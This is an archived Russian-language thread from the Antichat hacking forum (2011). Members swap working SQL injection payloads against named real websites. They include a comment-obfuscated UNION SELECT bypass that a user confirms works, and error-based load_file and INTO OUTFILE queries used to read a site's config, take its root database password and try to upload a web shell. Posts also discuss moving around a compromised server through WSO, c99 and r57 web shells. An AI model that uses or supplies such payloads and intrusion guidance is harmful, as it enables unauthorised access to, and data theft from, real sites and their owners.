ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

21.11.2011, 12:38
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме: 7879791
Репутация:
265
|
|
shadowrun, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+
сам не могу проверить, проксика нет
|
|
|

21.11.2011, 12:42
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме: 183267
Репутация:
84
|
|
Сообщение от stepashka_
shadowrun
, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+
сам не могу проверить, проксика нет
Пошло дело . Спасибо.
|
|
|

21.11.2011, 16:48
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Нашёл очень лакомую Time-Based скулю. Подскажите нормальный софт, ориентированный именно на неё ??
З.Ы. Канал стабильный, без скачков.
|
|
|

22.11.2011, 21:45
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Сообщение от None
http://www.play-money.ru/index.aspx?inf=30'
Можно ли как-то это использовать и куда копать?
|
|
|

22.11.2011, 22:04
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от DJ
[akep"]
DJ ][akep said:
Можно ли как-то это использовать и куда копать?
Для начало поищи другой уязвимый параметр
|
|
|

23.11.2011, 07:58
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от BigBear
Нашёл очень лакомую Time-Based скулю. Подскажите
нормальный софт
, ориентированный именно на неё ??
З.Ы. Канал стабильный, без скачков.
Хех. Цитирую сам себя уже.
Ну в общем нашёл я нужную утилиту. Называется Marathon Tool
Специально заточена под Time-Based SQL
Сайт автора тут
|
|
|

23.11.2011, 15:15
|
|
Познающий
Регистрация: 30.10.2011
Сообщений: 37
Провел на форуме: 7046
Репутация:
1
|
|
Прошу помощи!
Как всегда начну с фразы: "Уважаемые знатоки!"
Есть сайт:
1)file_priv=y
2)mq=off
3) есть /test.php
3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.
4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.
Теперь самое интересное:
config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+
запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:
яШяаJFIFHHяб4ExifII*bj( 1r2Ћi‡¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ яя Ж zLEAD Technologies Inc. V1.01FN(VЦHHяШ аJFIFHHянAdobe_CMяоAdobedЂяЫ„ яАc "яЭ яД? 3!1AQa"qЃ2‘Ў
и т.д...
ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)
P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists
Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.
|
|
|

23.11.2011, 18:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?
Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.
Надеюсь вопрос корректно составлен.
|
|
|

23.11.2011, 18:03
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме: 40748
Репутация:
78
|
|
Сообщение от mix0x0
На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?
Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.
Надеюсь вопрос корректно составлен.
зайди в консоль(в шелле) ls -lah /путь/до/директории
|
|
|

23.11.2011, 19:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
2lion-art по твоим описаниям залить шелл как два пальца об асфальт но...
спали в ПМ линк посмотрю и отпишусь, так как трудно что то тут посоветовать а то за каждый шаг будет плодится еще вопросы.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|